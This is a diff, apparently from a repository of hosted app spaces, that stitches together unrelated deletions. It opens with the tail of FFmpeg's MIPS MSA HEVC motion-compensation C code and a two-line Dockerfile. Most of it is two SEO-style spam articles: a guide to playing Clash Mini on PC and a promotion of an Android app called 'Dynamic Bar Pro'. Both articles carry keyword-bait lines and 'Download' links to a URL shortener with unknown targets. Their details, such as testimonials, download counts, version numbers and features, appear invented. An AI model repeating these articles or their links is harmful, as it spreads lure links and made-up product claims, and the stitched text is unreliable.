dst0_r = HEVC_FILT_4TAP(dst10_r, dst32_r, filt_h0, filt_h1); - dst0_l = HEVC_FILT_4TAP(dst10_l, dst32_l, filt_h0, filt_h1); - dst1_r = HEVC_FILT_4TAP(dst21_r, dst43_r, filt_h0, filt_h1); - dst1_l = HEVC_FILT_4TAP(dst21_l, dst43_l, filt_h0, filt_h1); - dst2_r = HEVC_FILT_4TAP(dst32_r, dst54_r, filt_h0, filt_h1); - dst2_l = HEVC_FILT_4TAP(dst32_l, dst54_l, filt_h0, filt_h1); - dst3_r = HEVC_FILT_4TAP(dst43_r, dst65_r, filt_h0, filt_h1); - dst3_l = HEVC_FILT_4TAP(dst43_l, dst65_l, filt_h0, filt_h1); - - SRA_4V(dst0_r, dst0_l, dst1_r, dst1_l, 6); - SRA_4V(dst2_r, dst2_l, dst3_r, dst3_l, 6); - PCKEV_H4_SW(dst0_l, dst0_r, dst1_l, dst1_r, dst2_l, dst2_r, dst3_l, - dst3_r, dst0_r, dst1_r, dst2_r, dst3_r); - ST_SW4(dst0_r, dst1_r, dst2_r, dst3_r, dst_tmp, dst_stride); - dst_tmp += (4 * dst_stride); - - dst10_r = dst54_r; - dst10_l = dst54_l; - dst21_r = dst65_r; - dst21_l = dst65_l; - dst2 = dst6; - } - - src += 8; - dst += 8; - - mask2 = LD_SB(ff_hevc_mask_arr + 16); - mask3 = mask2 + 2; - - LD_SB3(src, src_stride, src0, src1, src2); - src += (3 * src_stride); - XORI_B3_128_SB(src0, src1, src2); - VSHF_B2_SB(src0, src1, src0, src1, mask2, mask3, vec0, vec1); - VSHF_B2_SB(src1, src2, src1, src2, mask2, mask3, vec2, vec3); - dst10 = const_vec; - dst21 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst10, dst10); - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dst21, dst21); - ILVRL_H2_SH(dst21, dst10, dst10_r, dst21_r); - dst22 = (v8i16) __msa_splati_d((v2i64) dst21, 1); - - for (loop_cnt = 2; loop_cnt--;) { - LD_SB8(src, src_stride, src3, src4, src5, src6, src7, src8, src9, - src10); - src += (8 * src_stride); - XORI_B8_128_SB(src3, src4, src5, src6, src7, src8, src9, src10); - VSHF_B2_SB(src3, src7, src3, src7, mask2, mask3, vec0, vec1); - VSHF_B2_SB(src4, src8, src4, src8, mask2, mask3, vec2, vec3); - VSHF_B2_SB(src5, src9, src5, src9, mask2, mask3, vec4, vec5); - VSHF_B2_SB(src6, src10, src6, src10, mask2, mask3, vec6, vec7); - - dst73 = const_vec; - dst84 = const_vec; - dst95 = const_vec; - dst106 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst73, dst73); - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dst84, dst84); - DPADD_SB2_SH(vec4, vec5, filt0, filt1, dst95, dst95); - DPADD_SB2_SH(vec6, vec7, filt0, filt1, dst106, dst106); - - dst32_r = __msa_ilvr_h(dst73, dst22); - ILVRL_H2_SH(dst84, dst73, dst43_r, dst87_r); - ILVRL_H2_SH(dst95, dst84, dst54_r, dst98_r); - ILVRL_H2_SH(dst106, dst95, dst65_r, dst109_r); - dst22 = (v8i16) __msa_splati_d((v2i64) dst73, 1); - dst76_r = __msa_ilvr_h(dst22, dst106); - - tmp0 = HEVC_FILT_4TAP(dst10_r, dst32_r, filt_h0, filt_h1); - tmp1 = HEVC_FILT_4TAP(dst21_r, dst43_r, filt_h0, filt_h1); - tmp2 = HEVC_FILT_4TAP(dst32_r, dst54_r, filt_h0, filt_h1); - tmp3 = HEVC_FILT_4TAP(dst43_r, dst65_r, filt_h0, filt_h1); - tmp4 = HEVC_FILT_4TAP(dst54_r, dst76_r, filt_h0, filt_h1); - tmp5 = HEVC_FILT_4TAP(dst65_r, dst87_r, filt_h0, filt_h1); - tmp6 = HEVC_FILT_4TAP(dst76_r, dst98_r, filt_h0, filt_h1); - tmp7 = HEVC_FILT_4TAP(dst87_r, dst109_r, filt_h0, filt_h1); - - SRA_4V(tmp0, tmp1, tmp2, tmp3, 6); - SRA_4V(tmp4, tmp5, tmp6, tmp7, 6); - PCKEV_H4_SW(tmp1, tmp0, tmp3, tmp2, tmp5, tmp4, tmp7, tmp6, tmp0, tmp1, - tmp2, tmp3); - ST_D8(tmp0, tmp1, tmp2, tmp3, 0, 1, 0, 1, 0, 1, 0, 1, dst, dst_stride); - dst += (8 * dst_stride); - - dst10_r = dst98_r; - dst21_r = dst109_r; - dst22 = (v8i16) __msa_splati_d((v2i64) dst106, 1); - } -} - -static void hevc_hv_4t_16w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter_x, - const 
int8_t *filter_y, - int32_t height) -{ - if (4 == height) { - hevc_hv_4t_8multx4_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y, 2); - } else { - hevc_hv_4t_8multx4mult_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y, height, 2); - } -} - -static void hevc_hv_4t_24w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter_x, - const int8_t *filter_y, - int32_t height) -{ - hevc_hv_4t_8multx4mult_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y, height, 3); -} - -static void hevc_hv_4t_32w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter_x, - const int8_t *filter_y, - int32_t height) -{ - hevc_hv_4t_8multx4mult_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y, height, 4); -} - -#define MC_COPY(WIDTH) \ -void ff_hevc_put_hevc_pel_pixels##WIDTH##_8_msa(int16_t *dst, \ - const uint8_t *src, \ - ptrdiff_t src_stride, \ - int height, \ - intptr_t mx, \ - intptr_t my, \ - int width) \ -{ \ - hevc_copy_##WIDTH##w_msa(src, src_stride, dst, MAX_PB_SIZE, height); \ -} - -MC_COPY(4); -MC_COPY(6); -MC_COPY(8); -MC_COPY(12); -MC_COPY(16); -MC_COPY(24); -MC_COPY(32); -MC_COPY(48); -MC_COPY(64); - -#undef MC_COPY - -#define MC(PEL, DIR, WIDTH, TAP, DIR1, FILT_DIR) \ -void ff_hevc_put_hevc_##PEL##_##DIR##WIDTH##_8_msa(int16_t *dst, \ - const uint8_t *src, \ - ptrdiff_t src_stride, \ - int height, \ - intptr_t mx, \ - intptr_t my, \ - int width) \ -{ \ - const int8_t *filter = ff_hevc_##PEL##_filters[FILT_DIR - 1]; \ - \ - hevc_##DIR1##_##TAP##t_##WIDTH##w_msa(src, src_stride, dst, \ - MAX_PB_SIZE, filter, height); \ -} - -MC(qpel, h, 4, 8, hz, mx); -MC(qpel, h, 8, 8, hz, mx); -MC(qpel, h, 12, 8, hz, mx); -MC(qpel, h, 16, 8, hz, mx); -MC(qpel, h, 24, 8, hz, mx); -MC(qpel, h, 32, 8, hz, mx); -MC(qpel, h, 48, 8, hz, mx); -MC(qpel, h, 64, 8, hz, mx); - -MC(qpel, v, 4, 8, vt, my); -MC(qpel, v, 8, 8, vt, my); -MC(qpel, v, 12, 8, vt, my); -MC(qpel, v, 16, 8, vt, my); -MC(qpel, v, 24, 8, vt, my); -MC(qpel, v, 32, 8, vt, my); -MC(qpel, v, 48, 8, vt, my); -MC(qpel, v, 64, 8, vt, my); - -MC(epel, h, 4, 4, hz, mx); -MC(epel, h, 6, 4, hz, mx); -MC(epel, h, 8, 4, hz, mx); -MC(epel, h, 12, 4, hz, mx); -MC(epel, h, 16, 4, hz, mx); -MC(epel, h, 24, 4, hz, mx); -MC(epel, h, 32, 4, hz, mx); - -MC(epel, v, 4, 4, vt, my); -MC(epel, v, 6, 4, vt, my); -MC(epel, v, 8, 4, vt, my); -MC(epel, v, 12, 4, vt, my); -MC(epel, v, 16, 4, vt, my); -MC(epel, v, 24, 4, vt, my); -MC(epel, v, 32, 4, vt, my); - -#undef MC - -#define MC_HV(PEL, WIDTH, TAP) \ -void ff_hevc_put_hevc_##PEL##_hv##WIDTH##_8_msa(int16_t *dst, \ - const uint8_t *src, \ - ptrdiff_t src_stride, \ - int height, \ - intptr_t mx, \ - intptr_t my, \ - int width) \ -{ \ - const int8_t *filter_x = ff_hevc_##PEL##_filters[mx - 1]; \ - const int8_t *filter_y = ff_hevc_##PEL##_filters[my - 1]; \ - \ - hevc_hv_##TAP##t_##WIDTH##w_msa(src, src_stride, dst, MAX_PB_SIZE, \ - filter_x, filter_y, height); \ -} - -MC_HV(qpel, 4, 8); -MC_HV(qpel, 8, 8); -MC_HV(qpel, 12, 8); -MC_HV(qpel, 16, 8); -MC_HV(qpel, 24, 8); -MC_HV(qpel, 32, 8); -MC_HV(qpel, 48, 8); -MC_HV(qpel, 64, 8); - -MC_HV(epel, 4, 4); -MC_HV(epel, 6, 4); -MC_HV(epel, 8, 4); -MC_HV(epel, 12, 4); -MC_HV(epel, 16, 4); -MC_HV(epel, 24, 4); -MC_HV(epel, 32, 4); - -#undef MC_HV diff --git a/spaces/competitions/news-unmasked/Dockerfile b/spaces/competitions/news-unmasked/Dockerfile deleted file mode 100644 index 
0afc086eedf9fcd5a42adf6b9682cdb15d73a410..0000000000000000000000000000000000000000 --- a/spaces/competitions/news-unmasked/Dockerfile +++ /dev/null @@ -1,2 +0,0 @@ -FROM huggingface/competitions:latest -CMD competitions run \ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/Download Clash Mini for PC and Lead Your Army of Minis into Battle.md b/spaces/congsaPfin/Manga-OCR/logs/Download Clash Mini for PC and Lead Your Army of Minis into Battle.md deleted file mode 100644 index dff49e469bd13cef5832dd7a00ea38d561992f09..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/Download Clash Mini for PC and Lead Your Army of Minis into Battle.md +++ /dev/null @@ -1,172 +0,0 @@ - -

Clash Mini: A Fun and Strategy-Packed Board Game

-

If you are a fan of the Clash Universe, you will love Clash Mini, a new game from Supercell that lets you duel and rumble in a fun board game. Collect, summon, and upgrade your army of Minis, which are adorable versions of your favorite Clash characters, and watch them clash in exciting real-time battles. Predict your opponent's moves and assemble your winning strategy and formation. Lead your army with iconic Heroes such as Barbarian King, Archer Queen, Shield Maiden, and more. Change the tide of battle by swapping and upgrading your Minis in between rounds. Play casually for fun or in ranked matches to increase your league standing. Clash Mini is easy to learn but challenging to master. Get ready for your Minis to throw down the biggest rumble!

-

But what if you want to play Clash Mini on a bigger screen, with better controls and better performance? Well, you can do that by playing Clash Mini on your PC. In this article, we will show you how to download and install Clash Mini on your PC, how to play it, and some tips and tricks to help you win more games.

-

clash mini download for pc


Download →→→ https://urlca.com/2uOeDy



-

How to Download and Install Clash Mini on Your PC

-

There are two main ways to play Clash Mini on your PC. One is to use Windows 11 and native Android emulation, which is the official way to run Android apps on Windows. The other is to use an Android emulator such as Bluestacks 5, which is third-party software that simulates an Android device on your PC. Both methods have their pros and cons, so you can choose the one that suits you best.

-

Option 1: Use Windows 11 and native Android emulation

-

If you have a Windows 11 computer, you can use the native Android emulation feature that lets you run Android apps without installing a third-party emulator. It works through the Windows Subsystem for Android, a virtualized instance of Android running inside Windows, which lets Android apps, including games, run directly on Windows.

-

To use this feature, you need to have a Windows 11 computer that meets the minimum requirements for running Android apps. You also need to have a Microsoft account and an Amazon account. Then, you need to follow these steps:

-
    -
  1. Open the Microsoft Store app on your PC and search for "Windows Subsystem for Android". Install it on your PC.
  2. -
  3. Open the Microsoft Store app again and search for "Amazon Appstore". Install it on your PC.
  4. -
  5. Open the Amazon Appstore app on your PC and sign in with your Amazon account.
  6. -
  7. Search for "Clash Mini" in the Amazon Appstore app and install it on your PC.
  8. -
  9. Open the Start menu on your PC and look for "Clash Mini ". Click on it to launch the game.
  10. -
-

Congratulations, you have successfully installed and run Clash Mini on your PC using Windows 11 and native Android emulation. You can now enjoy the game on a bigger screen, with better graphics, and faster performance. You can also use your mouse and keyboard or a controller to play the game.

-

Option 2: Use an Android emulator such as Bluestacks 5

-

If you don't have a Windows 11 computer, or you prefer a different method, you can use an Android emulator such as Bluestacks 5 to play Clash Mini on your PC. An Android emulator is software that simulates an Android device on your PC, allowing you to run Android apps and games on it. Bluestacks 5 is one of the most popular and reliable Android emulators, with over 500 million users worldwide. It offers high performance, compatibility, customization, and security for playing Android games on PC.

-

To use this method, you need to have a PC that meets the minimum requirements for running Bluestacks 5. You also need to have a Google account. Then, you need to follow these steps:

-


-
    -
  1. Go to the official website of Bluestacks 5 and download the installer for your PC.
  2. -
  3. Run the installer and follow the instructions to install Bluestacks 5 on your PC.
  4. -
  5. Open Bluestacks 5 and sign in with your Google account.
  6. -
  7. Go to the Google Play Store app on Bluestacks 5 and search for "Clash Mini". Install it on Bluestacks 5.
  8. -
  9. Go to the home screen of Bluestacks 5 and look for "Clash Mini". Click on it to launch the game.
  10. -
-

Congratulations, you have successfully installed and run Clash Mini on your PC using Bluestacks 5. You can now enjoy the game on a bigger screen, with better graphics, and faster performance. You can also use your mouse and keyboard or a controller to play the game.

-

How to Play Clash Mini on Your PC

-

Now that you have installed Clash Mini on your PC, you might be wondering how to play it. Well, don't worry, we have got you covered. Here are some basic steps and tips on how to play Clash Mini on your PC:

-

Choose your Minis and Heroes

-

The first thing you need to do is to choose your army of Minis and Heroes. Minis are cute versions of Clash characters that have different abilities and roles in battle. Heroes are powerful leaders that can boost your Minis and unleash special skills. You can collect Minis and Heroes by opening chests, completing quests, or buying them with gems. You can also upgrade them by using gold and cards.

-

You can have up to eight Minis and one Hero in your army. You can customize your army according to your preference and strategy. You can also create different decks for different modes and situations. To choose your Minis and Heroes, go to the Army tab in the main menu and drag and drop them into the slots. You can also tap on them to see their stats and abilities.

-

Arrange your army on the board

-

The next thing you need to do is to arrange your army on the board. The board is where the battles take place. It has nine tiles for each player, where you can place your Minis. The board also has obstacles that can block or affect your Minis' movements and attacks.

-

You can arrange your army on the board before each round of battle. You can drag and drop your Minis onto the tiles, or use the auto-arrange button to let the game do it for you. You can also swap or remove your Minis by dragging them back to the slots or tapping on them. You have a limited time to arrange your army, so be quick and smart.

-

Upgrade your Minis during battle

-

The third thing you need to do is to upgrade your Minis during battle. Upgrading your Minis can make them stronger, faster, or more durable. It can also unlock new abilities or effects for them. Upgrading your Minis can give you an edge over your opponent in battle.

-

You can upgrade your Minis during battle by using gold that you earn from defeating enemy Minis or from chests. You can upgrade up to three times per round, but each upgrade costs more gold than the previous one. To upgrade your Minis during battle, tap on the upgrade button at the bottom of the screen and select the Mini you want to upgrade.

-

Use your mouse and keyboard or a controller

-

The last thing you need to do is to use your mouse and keyboard or a controller to play the game. Playing Clash Mini on your PC gives you the advantage of having better controls and accuracy than playing on a mobile device. You can use your mouse and keyboard or a controller to interact with the game and perform various actions.

-

You can use your mouse to drag and drop your Minis on the board, to tap on buttons and menus, and to scroll and zoom in and out. You can use your keyboard to use shortcuts and hotkeys for faster and easier gameplay. You can also use a controller to play the game, as long as it is compatible with your PC and the game. You can customize your controls and settings in the Options menu in the game.

-

Tips and Tricks for Playing Clash Mini on Your PC

-

Now that you know how to play Clash Mini on your PC, you might be looking for some tips and tricks to improve your skills and win more games. Well, don't worry, we have got you covered. Here are some tips and tricks for playing Clash Mini on your PC:

-

Anticipate your opponent's moves

-

One of the most important skills in Clash Mini is to anticipate your opponent's moves and counter them. You need to pay attention to what Minis and Heroes your opponent has, how they arrange them on the board, and what abilities they use. You also need to remember what Minis they have upgraded or swapped during battle. By doing so, you can predict what they will do next and plan your strategy accordingly.

-

For example, if you see that your opponent has a lot of ranged Minis, you might want to place some tanky Minis in front of them to block their shots. If you see that your opponent has a Hero that can heal their Minis, you might want to focus on taking out that Hero first. If you see that your opponent has a Mini that can stun or freeze your Minis, you might want to spread out your Minis or use a Mini that can cleanse or immune them.

-

Adjust your strategy according to the mode

-

Another important skill in Clash Mini is to adjust your strategy according to the mode you are playing. There are different modes in Clash Mini, such as Casual, Ranked, Friendly, and Special Events. Each mode has different rules, objectives, rewards, and challenges. You need to adapt your strategy according to the mode you are playing and the situation you are facing.

-

For example, in Casual mode, you can play for fun and experiment with different Minis and Heroes without worrying about losing trophies or ranks. In Ranked mode, you need to play more seriously and competitively to climb up the leagues and earn rewards. In Friendly mode, you can play with or against your friends or clanmates for fun or practice. In Special Events mode, you can play with unique rules or modifiers that change the gameplay.

-

Experiment with different combinations and abilities

-

One of the most fun aspects of Clash Mini is to experiment with different combinations and abilities of Minis and Heroes. There are many Minis and Heroes in Clash Mini, each with their own unique abilities and roles. You can mix and match them to create different synergies and effects. You can also upgrade them or swap them during battle to change their abilities or effects.

-

For example, you can combine Minis that have similar abilities or effects, such as fire damage, healing, or shielding. You can also combine Minis that have complementary abilities or effects, such as knockback, stun, or freeze. You can also combine Minis that have opposite abilities or effects, such as damage reduction, immunity, or cleanse. You can also combine Minis that have special interactions with each other, such as Prince Charming and Princess.

-

Sync your progress across devices

-

One of the most convenient features of Clash Mini is that you can sync your progress across devices. This means that you can play the game on your PC or your mobile device without losing any data or progress. You can switch between devices anytime you want without any hassle.

-

To sync your progress across devices, you need to link your game account with Google Play Games (for Android devices) or Game Center (for iOS devices). You also need to have an internet connection when you switch devices. To link your game account with Google Play Games or Game Center, go to the Settings menu in the game and tap on the Link button.

-

Conclusion

-

Clash Mini is a fun and strategy-packed board game that lets you duel and rumble in the Clash Universe. You can collect, summon, and upgrade your army of Minis and Heroes, watch them clash in exciting real-time battles, predict your opponent's moves and assemble your winning strategy and formation. You can play casually for fun or in ranked matches to increase your league standing.

-

But what if you want to play Clash Mini on a bigger screen, with better controls, and more performance? Well, you can do that by playing Clash Mini on your PC. You can use Windows 11 and native Android emulation, which is the official way to run Android apps on Windows. Or you can use an Android emulator such as Bluestacks 5, which is a third-party software that simulates an Android device on your PC. Both methods have their pros and cons, so you can choose the one that suits you best.

-

Playing Clash Mini on your PC gives you the advantage of having better graphics, faster performance, and more accuracy than playing on a mobile device. You can also use your mouse and keyboard or a controller to play the game. You can also sync your progress across devices, so you can switch between your PC and your mobile device anytime you want.

-

If you are looking for some tips and tricks to improve your skills and win more games, we have got you covered. You need to anticipate your opponent's moves and counter them, adjust your strategy according to the mode you are playing, experiment with different combinations and abilities of Minis and Heroes, and sync your progress across devices.

-

So what are you waiting for? Download Clash Mini on your PC today and enjoy the fun and strategy-packed board game. You will love it!

-

FAQs

-

What are the minimum requirements to run Clash Mini on PC?

-

To run Clash Mini on PC using Windows 11 and native Android emulation, you need to have a Windows 11 computer that meets these minimum requirements:

-
    -
  • Processor: 1 gigahertz (GHz) or faster with 2 or more cores on a compatible 64-bit processor or System on a Chip (SoC)
  • -
  • Memory: 4 GB RAM
  • -
  • Storage: 64 GB or larger storage device
  • -
  • Graphics card: Compatible with DirectX 12 or later with WDDM 2.0 driver
  • -
  • Display: High definition (720p) display that is greater than 9” diagonally, 8 bits per color channel
  • -
  • Internet connection: Internet connectivity is necessary to perform updates and to download and use some features
  • -
-

To run Clash Mini on PC using Bluestacks 5, you need to have a PC that meets these minimum requirements:

-
    -
  • OS: Microsoft Windows 7 and above
  • -
  • Processor: Intel or AMD Processor
  • -
  • RAM: At least 2GB of RAM
  • -
  • HDD: 5GB Free Disk Space
  • -
  • You must be an Administrator on your PC
  • -
  • Up to date graphics drivers from Microsoft or the chipset vendor
  • -
-

How can I get Google Play Games on Windows 11?

-

If you want to use Google Play Games on Windows 11, you need to sideload it separately, because it is not available in the Amazon Appstore. To do that, follow these steps:

-
    -
  1. Open the Windows Subsystem for Android app on your PC and go to the Developer options tab.
  2. -
  3. Enable Developer mode and ADB debugging.
  4. -
  5. Download the Google Play Games APK file from a trusted source.
  6. -
  7. Connect adb to the Windows Subsystem for Android by running "adb connect" with the IP address shown in its Developer options tab (no USB cable or separate Android device is needed).
  8. -
  9. Open a command prompt window on your PC and type "adb devices" to check if your device is detected.
  10. -
  11. Type "adb install " to install the Google Play Games APK file on your PC.
  12. -
  13. Open the Google Play Games app on your PC and sign in with your Google account.
  14. -
-

What are the best Minis and Heroes to use in Clash Mini?

-

The answer to this question depends on your personal preference and strategy. However, some general tips are:

-
    -
  • Use Minis and Heroes that have similar or complementary abilities or effects, such as fire damage, healing, or shielding.
  • -
  • Use Minis and Heroes that have opposite or counter abilities or effects, such as damage reduction, immunity, or cleanse.
  • -
  • Use Minis and Heroes that have special interactions with each other, such as Prince Charming and Princess.
  • -
  • Use Minis and Heroes that suit the mode you are playing, such as Casual, Ranked, Friendly, or Special Events.
  • -
-

How can I earn rewards and points in Clash Mini?

-

You can earn rewards and points in Clash Mini by doing various activities in the game, such as:

-
    -
  • Winning battles in Casual, Ranked, Friendly, or Special Events modes.
  • -
  • Opening chests that contain gold, cards, gems, and other items.
  • -
  • Completing quests that give you gold, gems, and chests.
  • -
  • Participating in the Season Pass that gives you exclusive rewards and perks.
  • -
  • Joining a clan and donating or requesting cards.
  • -
-

How can I find friends and chat with other players in Clash Mini?

-

You can find friends and chat with other players in Clash Mini by using the social features in the game, such as:

-
    -
  • Adding friends by using their player tags or QR codes.
  • -
  • Joining or creating a clan and inviting your friends to join.
  • -
  • Chatting with your clanmates or friends in the clan or friend chat.
  • -
  • Sending or receiving friend requests, messages, or emojis.
  • -
  • Playing with or against your friends or clanmates in Friendly mode.
  • -

-
-
\ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/Dynamic Bar Pro How to Get the Best of Both Worlds with iOS 16 and Android Features.md b/spaces/congsaPfin/Manga-OCR/logs/Dynamic Bar Pro How to Get the Best of Both Worlds with iOS 16 and Android Features.md deleted file mode 100644 index cabde28dfb46a4047d56cc1fae7ab1cc3b44e267..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/Dynamic Bar Pro How to Get the Best of Both Worlds with iOS 16 and Android Features.md +++ /dev/null @@ -1,160 +0,0 @@ -
-

Download Dynamic Bar Pro: How to Get the iPhone 14 Pro's Dynamic Island Feature on Your Android Phone

-

Do you want to enjoy the latest iOS 16 iPhone 14 Pro's unique feature "Dynamic Island" on your Android phone without switching to a new device or spending a fortune? If yes, then you are in luck, because there is an app that can help you achieve that. It is called Dynamic Bar Pro, and it is a powerful and customizable app that lets you have a dynamic and interactive notification bar on your Android phone, just like the iPhone 14 Pro's Dynamic Island feature.

-

Dynamic Bar Pro is an app that transforms your boring and static notification bar into a pill-shaped dynamic bar that you can interact with using various gestures. You can use the dynamic bar to access notifications, music controls, messaging, and more, without leaving your current app or screen. You can also customize the dynamic bar to fit your needs and preferences, such as changing its size, position, background color, transparency, etc. You can even create different styles and themes for your dynamic bar to match your mood or personality.

-

download dynamic bar pro


DOWNLOAD »»» https://urlca.com/2uO9b9



-

Dynamic Bar Pro is a popular and highly rated app on the Google Play Store, with over 1 million downloads and 4.5 stars out of 5. Many users have praised the app for its functionality, design, and ease of use. Some of the testimonials from satisfied users are:

-
    -
  • "This app is amazing! It makes my Android phone look like an iPhone 14 Pro. I love the dynamic bar and how it changes according to the app I'm using. It's very convenient and fun to use."
  • -
  • "Dynamic Bar Pro is the best app ever! It gives me quick access to everything I need from the notification bar. I can control my music, reply to messages, check notifications, and more, without interrupting my work or game. It's a must-have app for Android users."
  • -
  • "I'm very impressed with Dynamic Bar Pro. It's very customizable and easy to use. I can change the size, color, transparency, and position of the dynamic bar to suit my liking. It also works well with other apps and launchers. It's a great app that enhances my Android experience."
  • -
-

If you are interested in trying out Dynamic Bar Pro and getting the iPhone 14 Pro's Dynamic Island feature on your Android phone, then read on to find out how to download, customize, and use this amazing app.

-


-

How to download Dynamic Bar Pro from Google Play Store

-

Downloading Dynamic Bar Pro from Google Play Store is very simple and straightforward. All you need to do is follow these steps:

-
    -
  1. Open the Google Play Store app on your Android phone or visit this link on your browser.
  2. -
  3. Search for Dynamic Bar Pro or tap on the link above.
  4. -
  5. On the app page, tap on the Install button to download and install the app on your phone.
  6. -
  7. Once the installation is complete, tap on the Open button to launch the app on your phone.
  8. -
-

Dynamic Bar Pro is a free app that requires Android 5.1 or higher to run. The app size is about 6 MB and the current version is 1.0.8. The app has a rating of 4.5 out of 5 stars based on over 10 thousand reviews.

-

How to customize Dynamic Bar Pro to fit your needs and preferences

-

One of the best features of Dynamic Bar Pro is that it allows you to customize the dynamic bar to fit your needs and preferences. You can change various options, such as size, position, background color, transparency, etc., to create your own unique style and theme for your dynamic bar.

-

To access the app settings and customize the dynamic bar, follow these steps:

-
    -
  1. Open the Dynamic Bar Pro app on your phone or swipe down from the top of your screen to access the notification panel.
  2. -
  3. Tap on the gear icon on the top right corner of the dynamic bar or the app screen.
  4. -
  5. You will see a list of options that you can change for your dynamic bar.
  6. -
  7. Tap on any option that you want to change and adjust it according to your liking.
  8. -
  9. You can preview the changes on the dynamic bar as you make them.
  10. -
  11. When you are done customizing the dynamic bar, tap on the Save button on the top right corner of the screen.
  12. -
-

Some of the options that you can change for your dynamic bar are:

-
    -
  • Size: You can change the width and height of the dynamic bar using sliders or entering values in pixels.
  • -
  • Position: You can change the position of the dynamic bar on your screen using sliders or entering values in pixels. You can also choose whether you want the dynamic bar to be at the top or bottom of your screen.
  • -
  • Background color: You can change the background color of the dynamic bar using a color picker or choosing from a list of predefined colors. You can also enable or disable the gradient effect for the background color.
  • -
  • Transparency: You can change the transparency of the dynamic bar using a slider or entering a value in percentage. You can also enable or disable the blur effect for the transparency.
  • -
  • Animation: You can change the animation of the dynamic bar when it appears or disappears on your screen. You can choose from a list of animation types, such as slide, fade, rotate, etc.
  • -
  • Notification dialog: You can change the appearance and behavior of the notification dialog that shows up when you tap on the dynamic bar. You can change the size, position, background color, transparency, animation, etc. of the notification dialog. You can also choose whether you want to show the small dialog or the extended dialog for notifications.
  • -
-

With these options, you can create different styles and themes for your dynamic bar, such as dark mode, light mode, rainbow mode, etc. You can also save and load your custom styles and themes using the app settings.

-

Here are some examples of different styles and themes that you can create with Dynamic Bar Pro:

- - - - - - - - - - - - - - - - - - - - - - - - - -
Style/theme examples (screenshots not reproduced here): dark mode, light mode, rainbow mode, minimalist mode, and gamer mode.
-

Some tips and tricks to optimize the app performance and battery usage are:

-
    -
  • Disable the dynamic bar when you are not using it or when you don't need it.
  • -
  • Reduce the size and transparency of the dynamic bar to save screen space and battery power.
  • -
  • Disable the animation and blur effects of the dynamic bar and the notification dialog to reduce CPU and GPU usage.
  • -
  • Use the small dialog instead of the extended dialog for notifications to save memory and bandwidth.
  • -
  • Clear the cache and data of the app regularly to free up storage space and improve app speed.
  • -
-

How to use Dynamic Bar Pro to access notifications, music controls, messaging, and more

-

Another great feature of Dynamic Bar Pro is that it allows you to access notifications, music controls, messaging, and more from the dynamic bar without leaving your current app or screen. You can interact with the dynamic bar using various gestures, such as tap, hold, swipe, etc.

-

To interact with the dynamic bar using gestures, follow these steps:

-
    -
  1. Swipe down from the top of your screen to access the notification panel or open any app on your phone.
  2. -
  3. You will see a pill-shaped dynamic bar on your screen. You can move it around by dragging it with your finger.
  4. -
  5. To view and manage notifications from different apps, tap on the dynamic bar. You will see a small dialog that shows your notifications. You can swipe left or right on a notification to dismiss it or swipe down on it to expand it. You can also tap on a notification to open it in its respective app.
  6. -
  7. To access more options for notifications, hold on the dynamic bar. You will see an extended notification dialog that shows more details and actions for your notifications. You can swipe left or right on a notification to dismiss it or swipe down on it to expand it. You can also tap on a notification to open it in its respective app. You can also tap on the icons at the bottom of the dialog to access quick settings, clear all notifications, or close the dialog.
  8. -
  9. To control music playback from the dynamic bar without opening the music app, swipe left or right on the dynamic bar. You will see a music control panel that shows your current song title, artist name, album art, and playback status. You can tap on the play/pause button to play or pause the music, or tap on the previous or next buttons to skip songs. You can also tap on the album art to open the music app.
  10. -
  11. To mark messages as read or reply to them from the dynamic bar without opening the messaging app, swipe up or down on the dynamic bar. You will see a messaging panel that shows your recent messages from different apps. You can swipe left or right on a message to mark it as read or unread, or swipe down on it to expand it. You can also tap on a message to open a quick reply dialog where you can type and send your reply. You can also tap on the message icon to open the messaging app.
  12. -
  13. To access some other useful features of the dynamic bar, such as volume control, screenshot, screen lock, power options, etc., double-tap on the dynamic bar. You will see a utility panel that shows various icons for different features. You can tap on any icon to activate its feature. For example, you can tap on the volume icon to adjust the volume level, or tap on the screenshot icon to take a screenshot of your screen.
  14. -
-

With these gestures, you can use the dynamic bar to access notifications, music controls, messaging, and more, without leaving your current app or screen. You can also customize the gestures and their actions using the app settings.
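For readers curious how this kind of notification mirroring is possible at all, the sketch below shows the standard Android mechanism that overlay apps of this type generally rely on: a NotificationListenerService. Dynamic Bar Pro's actual implementation is not public, so treat this purely as a minimal, hedged illustration; the class name is invented, and a real app must declare the service with the BIND_NOTIFICATION_LISTENER_SERVICE permission and be granted notification access by the user before it receives anything.

```kotlin
import android.app.Notification
import android.service.notification.NotificationListenerService
import android.service.notification.StatusBarNotification

// Illustrative only: a minimal listener that mirrors posted notifications.
// The class name is hypothetical, not taken from Dynamic Bar Pro.
class ExampleBarListener : NotificationListenerService() {

    override fun onNotificationPosted(sbn: StatusBarNotification) {
        val extras = sbn.notification.extras
        val title = extras.getCharSequence(Notification.EXTRA_TITLE)
        val text = extras.getCharSequence(Notification.EXTRA_TEXT)
        // A real overlay app would forward title/text to its floating bar here.
    }

    override fun onNotificationRemoved(sbn: StatusBarNotification) {
        // Remove the corresponding entry from the overlay when it is cleared.
    }

    // Dismissing a notification from the overlay maps onto cancelNotification().
    fun dismissFromOverlay(sbn: StatusBarNotification) = cancelNotification(sbn.key)
}
```

Music controls and quick replies build on the same data: media notifications carry a media session token and messaging notifications expose reply actions, both of which a listener like this can read from the posted notification.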

-

Conclusion

-

